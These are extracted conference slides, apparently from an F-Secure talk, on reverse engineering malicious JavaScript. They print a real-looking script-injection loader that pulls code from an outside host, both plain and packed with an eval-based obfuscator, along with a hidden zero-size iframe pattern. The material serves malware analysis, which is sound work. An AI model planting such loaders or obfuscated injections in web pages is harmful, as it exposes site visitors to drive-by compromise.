Reverse Engineering Interpreted Languages

Karmina  Aquino  F-­‐Secure  Corpora3on  

Compiled vs Interpreted

0 1 0 0 1 0 0 0 0 1 0 0 1 0 0 1

aload_0 iconst_0 iconst_3 istore_2 iload_3

Examples of Interpreted Languages

Why Javascript?

Why do malware authors use Javascript?

Cross-browser compatibility

Default HTML script language

AJAX

Supported by several applications

<script>  

<iframe src ='test.js' width=0 height=0></iframe>

<!-- ***Javascript code*** --> </script>

TAGS

<script type='text/javascript'>

<script type='text/javascript' src='test.js'></script>  

document.write() document.createElement()

eval()

location.reload() location.replace() location.href()

onLoad() onUnload() onSubmit()

Objects and Global Functions

loadScript_YOU(); function loadScript_YOU() {

if ('https:' == document.location.protocol) return false; var s = document.createElement('script'); s.setAttribute("type","text/javascript"); s.setAttribute("src", "http://enchulafb.info/script.js"); var head=document.getElementsByTagName("head")[0]; if( head==null) return false; head.appendChild(s); return true;

}

eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3();9 3(){4(\'b:\'==1.c.d)2 5;6 s=1.e(\'7\');s.8("f","g/h");s.8("i","j://k.l/7.m");6 a=1.n("o")[0];4(a==p)2 5;a.q(s);2 r}',29,29,'|document|return|loadScript_YOU|if|false|var|script|setAttribute|function||https|location|protocol|createElement|type|text|javascript|src|http|enchulafb|info|js|getElementsByTagName|head|null|appendChild|true|'.split('|'),0,{}))

eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3();9 3(){4(\'b:\'==1.c.d)2 5;6 s=1.e(\'7\');s.8("f","g/h");s.8("i","j://k.l/7.m");6 a=1.n("o")[0];4(a==p)2 5;a.q(s);2 r}',29,29,'|document|return|loadScript_YOU|if|false|var|script|setAttribute|function||https|location|protocol|createElement|type|text|javascript|src|http|enchulafb|info|js|getElementsByTagName|head|null|appendChild|true|'.split('|'),0,{}))

own obfuscation code

Dean Edwards /packer/

eval(function(p,a,c,k,e,d)…

anti-debugging

arguments.callee.toString() location.href document.cookie

SPIDERMONKEY

document = { write:print }; eval = function(input_string) { print("eval(" + input_string + ")"); } // and so on

js.exe –f wrapper.js –f malware.js

h5ps://developer.mozilla.org/En/SpiderMonkey/Introduc3on_to_the_JavaScript_shell    

wrapper.js  

Real-world Scenario